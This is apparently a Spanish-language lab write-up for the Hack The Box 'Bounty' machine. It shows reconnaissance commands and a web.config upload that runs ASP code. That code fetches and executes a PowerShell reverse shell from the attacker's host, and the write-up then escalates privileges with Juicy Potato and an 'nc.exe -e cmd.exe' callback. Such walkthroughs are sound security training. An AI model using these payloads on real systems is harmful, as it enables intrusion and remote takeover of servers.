echo "10.129.154.47 bounty.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.154.47 --min-rate=10000 --script=vuln --script-timeout=15 -v

![[Pasted image 20210518133749.png]]

nmap -sC -sV -O -p- -oA bounty 10.129.154.47

nmap -sU -O -p- -oA bounty-udp 10.129.154.47

nikto -h 10.129.154.47:80

Pasted image 20210518134244.png

 usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx

Pasted image 20210518134959.png

Pasted image 20210518133714.png

Pasted image 20210518135135.png

Subo un archivo jpeg y sale que fue exitoso

Pasted image 20210518135222.png

Pasted image 20210518135816.png

Trate de usar un archivo asp y aspx pero me salio un error

Lo raro es que si acepta archivos de web.config que es un archivo con ajustes para aplicaciones en IIS. Es como .htaccess para los servidores de Apache.

https://raw.githubusercontent.com/tennc/webshell/master/aspx/web.config

Pasted image 20210518141544.png

vim Invoke-PowerShellTcp.ps1

cambiamos la ultima linea a la ip de tu maquina de kali

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.116 -Port 4444

Cambiamos el web.config en la parte de abajo para que diga lo siguiente:

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.116:1337/Invoke-PowerShellTcp.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

python3 -m htt.server 1337

Pasted image 20210518143505.png

cd c:
mkdir tmp cd tmp whoami /priv

Pasted image 20210518152137.png

https://github.com/ohpe/juicy-potato/releases/tag/v0.1

Bajamos archivos de la maquina de kali a la maquina de windows

Pasted image 20210518154858.png


./juicy.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\Users\merlin\Desktop\nc.exe -e cmd.exe 10.10.XX.XX 1337" -t *

Pasted image 20210518160104.png

nc -lvnp 1337

Pasted image 20210518160429.png

boxes

copyright©2022 Cu3rv0x all rights reserved